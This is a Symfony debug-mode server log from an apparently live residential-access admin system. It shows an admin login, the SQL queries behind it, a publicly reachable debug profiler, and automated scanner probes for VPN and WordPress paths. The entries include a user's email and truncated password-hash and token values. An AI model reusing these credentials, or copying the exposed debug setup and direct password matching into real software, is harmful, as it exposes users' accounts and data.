[2025-12-15 23:13:27] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/","method":"GET"} []
[2025-12-15 23:13:27] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
[2025-12-15 23:13:27] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-15 23:13:27] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-15 23:13:27] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-15 23:13:27] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-15 23:13:27] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-15 23:13:27] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?redirect_uri=https%3A%2F%2Fadmin.unda.co%2F","method":"GET"} []
[2025-12-15 23:13:28] request.INFO: Matched route "_wdt". {"route":"_wdt","route_parameters":{"_controller":"web_profiler.controller.profiler:toolbarAction","token":"c499c9","_route":"_wdt"},"request_uri":"https://auth.unda.co/_wdt/c499c9","method":"GET"} []
[2025-12-15 23:13:30] request.INFO: Matched route "login". {"route":"login","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\LoginController::indexAction","domain":"auth.unda.co","_route":"login"},"request_uri":"https://auth.unda.co/login","method":"POST"} []
[2025-12-15 23:13:30] doctrine.DEBUG: SELECT u0_.id AS id_0, u0_.uuid AS uuid_1, u0_.status AS status_2, u0_.date_created AS date_created_3, u0_.date_modified AS date_modified_4, u0_.name AS name_5, u0_.last_name AS last_name_6, u0_.email AS email_7, u0_.password AS password_8, u0_.media_path AS media_path_9, u0_.thumb_path AS thumb_path_10, u0_.curp AS curp_11, u0_.phone AS phone_12, u0_.email_verification AS email_verification_13, u0_.phone_verification AS phone_verification_14 FROM user u0_ WHERE (u0_.email = ?) AND (u0_.password = ?) LIMIT 1 ["julieta@underdog.mx","77ef29c36736bfdfdf1d78fee1 [...]"] []
[2025-12-15 23:13:30] doctrine.DEBUG: "START TRANSACTION" [] []
[2025-12-15 23:13:30] doctrine.DEBUG: INSERT INTO access_token (client_id, token, expires_at, scope, user_id, data) VALUES (?, ?, ?, ?, ?, ?) {"1":0,"2":"dace7224b1fa1587a6f593b6ae [...]","3":"2025-12-15 23:43:30","4":"","5":374,"6":"[]"} []
[2025-12-15 23:13:30] doctrine.DEBUG: "COMMIT" [] []
[2025-12-15 23:13:30] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/","method":"GET"} []
[2025-12-15 23:13:30] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
[2025-12-15 23:13:30] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-15 23:13:30] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-15 23:13:30] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-15 23:13:30] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["dace7224b1fa1587a6f593b6ae [...]"] []
[2025-12-15 23:13:30] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [374] []
[2025-12-15 23:13:30] doctrine.DEBUG: SELECT r0_.id AS id_0, r0_.uuid AS uuid_1, r0_.status AS status_2, r0_.date_created AS date_created_3, r0_.date_modified AS date_modified_4, r0_.name AS name_5, r0_.id_rule AS id_rule_6, r0_.plate_rule AS plate_rule_7, r0_.cp AS cp_8, r0_.neighborhood AS neighborhood_9, r0_.country AS country_10, r0_.state AS state_11, r0_.city AS city_12, u1_.permission AS permission_13 FROM residential r0_ INNER JOIN user_has_residential u1_ ON ((u1_.residential_id = r0_.id) AND (u1_.user_id = ?) AND (u1_.status = ?)) LIMIT 10 OFFSET 0 [374,1] []
[2025-12-15 23:13:30] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"julieta@underdog.mx\", authenticated=true, roles=\"ROLE_ADMIN\"))","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-15 23:13:30] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-15 23:13:30] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-15 23:13:30] security.DEBUG: Stored the security token in the session. {"key":"_security_cookie_presence"} []
[2025-12-15 23:13:31] request.INFO: Matched route "_wdt". {"route":"_wdt","route_parameters":{"_controller":"web_profiler.controller.profiler:toolbarAction","token":"17eb8c","_route":"_wdt"},"request_uri":"https://admin.unda.co/_wdt/17eb8c","method":"GET"} []
[2025-12-15 23:13:31] security.DEBUG: Read existing security token from the session. {"key":"_security_cookie_presence","token_class":"Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken"} []
[2025-12-15 23:13:31] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["dace7224b1fa1587a6f593b6ae [...]"] []
[2025-12-15 23:13:31] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [374] []
[2025-12-15 23:13:31] doctrine.DEBUG: SELECT r0_.id AS id_0, r0_.uuid AS uuid_1, r0_.status AS status_2, r0_.date_created AS date_created_3, r0_.date_modified AS date_modified_4, r0_.name AS name_5, r0_.id_rule AS id_rule_6, r0_.plate_rule AS plate_rule_7, r0_.cp AS cp_8, r0_.neighborhood AS neighborhood_9, r0_.country AS country_10, r0_.state AS state_11, r0_.city AS city_12, u1_.permission AS permission_13 FROM residential r0_ INNER JOIN user_has_residential u1_ ON ((u1_.residential_id = r0_.id) AND (u1_.user_id = ?) AND (u1_.status = ?)) LIMIT 10 OFFSET 0 [374,1] []
[2025-12-15 23:13:31] security.DEBUG: User was reloaded from a user provider. {"provider":"Hona\\AdminBundle\\Security\\AdminUserProvider","username":"julieta@underdog.mx"} []
[2025-12-15 23:13:31] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
[2025-12-15 23:13:31] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-15 23:13:31] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-15 23:13:31] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-15 23:13:31] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["dace7224b1fa1587a6f593b6ae [...]"] []
[2025-12-15 23:13:31] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [374] []
[2025-12-15 23:13:31] doctrine.DEBUG: SELECT r0_.id AS id_0, r0_.uuid AS uuid_1, r0_.status AS status_2, r0_.date_created AS date_created_3, r0_.date_modified AS date_modified_4, r0_.name AS name_5, r0_.id_rule AS id_rule_6, r0_.plate_rule AS plate_rule_7, r0_.cp AS cp_8, r0_.neighborhood AS neighborhood_9, r0_.country AS country_10, r0_.state AS state_11, r0_.city AS city_12, u1_.permission AS permission_13 FROM residential r0_ INNER JOIN user_has_residential u1_ ON ((u1_.residential_id = r0_.id) AND (u1_.user_id = ?) AND (u1_.status = ?)) LIMIT 10 OFFSET 0 [374,1] []
[2025-12-15 23:13:31] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"julieta@underdog.mx\", authenticated=true, roles=\"ROLE_ADMIN\"))","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-15 23:13:31] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-15 23:13:31] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-15 23:13:31] security.DEBUG: Stored the security token in the session. {"key":"_security_cookie_presence"} []
[2025-12-15 23:13:47] request.INFO: Matched route "access_history_list". {"route":"access_history_list","route_parameters":{"size":10,"page":0,"_controller":"Hona\\AdminBundle\\Controller\\AccessHistoryController::accessHistoryListAction","_route":"access_history_list"},"request_uri":"https://admin.unda.co/access_history/list","method":"GET"} []
[2025-12-15 23:13:47] security.DEBUG: Read existing security token from the session. {"key":"_security_cookie_presence","token_class":"Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken"} []
[2025-12-15 23:13:47] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["dace7224b1fa1587a6f593b6ae [...]"] []
[2025-12-15 23:13:47] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [374] []
[2025-12-15 23:13:47] doctrine.DEBUG: SELECT r0_.id AS id_0, r0_.uuid AS uuid_1, r0_.status AS status_2, r0_.date_created AS date_created_3, r0_.date_modified AS date_modified_4, r0_.name AS name_5, r0_.id_rule AS id_rule_6, r0_.plate_rule AS plate_rule_7, r0_.cp AS cp_8, r0_.neighborhood AS neighborhood_9, r0_.country AS country_10, r0_.state AS state_11, r0_.city AS city_12, u1_.permission AS permission_13 FROM residential r0_ INNER JOIN user_has_residential u1_ ON ((u1_.residential_id = r0_.id) AND (u1_.user_id = ?) AND (u1_.status = ?)) LIMIT 10 OFFSET 0 [374,1] []
[2025-12-15 23:13:47] security.DEBUG: User was reloaded from a user provider. {"provider":"Hona\\AdminBundle\\Security\\AdminUserProvider","username":"julieta@underdog.mx"} []
[2025-12-15 23:13:47] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
[2025-12-15 23:13:47] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-15 23:13:47] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-15 23:13:47] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-15 23:13:47] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["dace7224b1fa1587a6f593b6ae [...]"] []
[2025-12-15 23:13:47] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [374] []
[2025-12-15 23:13:47] doctrine.DEBUG: SELECT r0_.id AS id_0, r0_.uuid AS uuid_1, r0_.status AS status_2, r0_.date_created AS date_created_3, r0_.date_modified AS date_modified_4, r0_.name AS name_5, r0_.id_rule AS id_rule_6, r0_.plate_rule AS plate_rule_7, r0_.cp AS cp_8, r0_.neighborhood AS neighborhood_9, r0_.country AS country_10, r0_.state AS state_11, r0_.city AS city_12, u1_.permission AS permission_13 FROM residential r0_ INNER JOIN user_has_residential u1_ ON ((u1_.residential_id = r0_.id) AND (u1_.user_id = ?) AND (u1_.status = ?)) LIMIT 10 OFFSET 0 [374,1] []
[2025-12-15 23:13:47] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"julieta@underdog.mx\", authenticated=true, roles=\"ROLE_ADMIN\"))","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-15 23:13:47] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-15 23:13:47] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-15 23:13:47] doctrine.DEBUG: SELECT a0_.id AS id_0, a0_.uuid AS uuid_1, a0_.date_entry AS date_entry_2, a0_.name AS name_3, a0_.last_name AS last_name_4, a0_.date_departure AS date_departure_5, CONCAT(a0_.name, ' ', a0_.last_name) AS sclr_6, CONCAT(u1_.name, ' ', u1_.last_name) AS sclr_7, CONCAT(a2_.street, ' ', a2_.outdoor_number, ' ', a2_.interior_number) AS sclr_8, d3_.model AS model_9 FROM access_history a0_ INNER JOIN address a2_ ON ((a0_.address_id = a2_.id) AND (a2_.residential_id = ?)) LEFT JOIN user u1_ ON ((a0_.user_id = u1_.id)) LEFT JOIN device d3_ ON ((u1_.id = d3_.user_id)) GROUP BY a0_.id ORDER BY a0_.date_entry DESC LIMIT 10 OFFSET 0 [15] []
[2025-12-15 23:13:47] doctrine.DEBUG: SELECT count(DISTINCT a0_.id) AS sclr_0 FROM access_history a0_ INNER JOIN address a1_ ON ((a0_.address_id = a1_.id) AND (a1_.residential_id = ?)) [15] []
[2025-12-15 23:13:47] security.DEBUG: Stored the security token in the session. {"key":"_security_cookie_presence"} []
[2025-12-15 23:13:47] request.INFO: Matched route "_wdt". {"route":"_wdt","route_parameters":{"_controller":"web_profiler.controller.profiler:toolbarAction","token":"dd219e","_route":"_wdt"},"request_uri":"https://admin.unda.co/_wdt/dd219e","method":"GET"} []
[2025-12-15 23:13:47] security.DEBUG: Read existing security token from the session. {"key":"_security_cookie_presence","token_class":"Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken"} []
[2025-12-15 23:13:48] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["dace7224b1fa1587a6f593b6ae [...]"] []
[2025-12-15 23:13:48] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [374] []
[2025-12-15 23:13:48] doctrine.DEBUG: SELECT r0_.id AS id_0, r0_.uuid AS uuid_1, r0_.status AS status_2, r0_.date_created AS date_created_3, r0_.date_modified AS date_modified_4, r0_.name AS name_5, r0_.id_rule AS id_rule_6, r0_.plate_rule AS plate_rule_7, r0_.cp AS cp_8, r0_.neighborhood AS neighborhood_9, r0_.country AS country_10, r0_.state AS state_11, r0_.city AS city_12, u1_.permission AS permission_13 FROM residential r0_ INNER JOIN user_has_residential u1_ ON ((u1_.residential_id = r0_.id) AND (u1_.user_id = ?) AND (u1_.status = ?)) LIMIT 10 OFFSET 0 [374,1] []
[2025-12-15 23:13:48] security.DEBUG: User was reloaded from a user provider. {"provider":"Hona\\AdminBundle\\Security\\AdminUserProvider","username":"julieta@underdog.mx"} []
[2025-12-15 23:13:48] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
[2025-12-15 23:13:48] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-15 23:13:48] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-15 23:13:48] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-15 23:13:48] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["dace7224b1fa1587a6f593b6ae [...]"] []
[2025-12-15 23:13:48] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [374] []
[2025-12-15 23:13:48] doctrine.DEBUG: SELECT r0_.id AS id_0, r0_.uuid AS uuid_1, r0_.status AS status_2, r0_.date_created AS date_created_3, r0_.date_modified AS date_modified_4, r0_.name AS name_5, r0_.id_rule AS id_rule_6, r0_.plate_rule AS plate_rule_7, r0_.cp AS cp_8, r0_.neighborhood AS neighborhood_9, r0_.country AS country_10, r0_.state AS state_11, r0_.city AS city_12, u1_.permission AS permission_13 FROM residential r0_ INNER JOIN user_has_residential u1_ ON ((u1_.residential_id = r0_.id) AND (u1_.user_id = ?) AND (u1_.status = ?)) LIMIT 10 OFFSET 0 [374,1] []
[2025-12-15 23:13:48] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"julieta@underdog.mx\", authenticated=true, roles=\"ROLE_ADMIN\"))","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-15 23:13:48] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-15 23:13:48] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-15 23:13:48] security.DEBUG: Stored the security token in the session. {"key":"_security_cookie_presence"} []
[2025-12-15 23:19:59] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sslvpn_logon.shtml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sslvpn_logon.shtml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-15 23:33:05] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"661854","_route":"_profiler_search_results"},"request_uri":"https://web.unda.co/_profiler/661854/search/results?ip=189.172.56.183&limit=10&method=POST","method":"GET"} []
[2025-12-15 23:33:05] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?ip=189.172.56.183&limit=10&method=POST","method":"GET"} []
[2025-12-15 23:33:09] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"c4001c","_route":"_profiler_search_results"},"request_uri":"https://web.unda.co/_profiler/c4001c/search/results?ip=189.172.56.183&limit=10&method=POST","method":"GET"} []
[2025-12-15 23:33:09] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?ip=189.172.56.183&limit=10&method=POST","method":"GET"} []
[2025-12-15 23:33:47] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0c03d3","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/0c03d3?panel=cache","method":"GET"} []
[2025-12-15 23:33:47] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
[2025-12-15 23:34:55] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /enhancecp"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /enhancecp\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-15 23:43:46] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-15 23:43:50] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/js/crop/" (from "https://www.google.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/js/crop/\" (from \"https://www.google.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-15 23:43:51] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/pomo/" (from "https://www.google.co.uk/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/pomo/\" (from \"https://www.google.co.uk/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-15 23:43:53] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/theme-compat/" (from "https://www.google.de/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/theme-compat/\" (from \"https://www.google.de/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-15 23:43:56] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/rest-api" (from "https://www.google.de/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/rest-api\" (from \"https://www.google.de/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-15 23:43:56] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/theme-compat" (from "https://www.yahoo.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/theme-compat\" (from \"https://www.yahoo.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
